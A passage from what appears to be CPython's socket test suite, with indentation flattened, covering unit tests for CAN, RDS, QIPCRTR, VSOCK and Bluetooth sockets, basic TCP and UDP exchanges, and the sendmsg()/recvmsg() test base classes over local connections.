@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
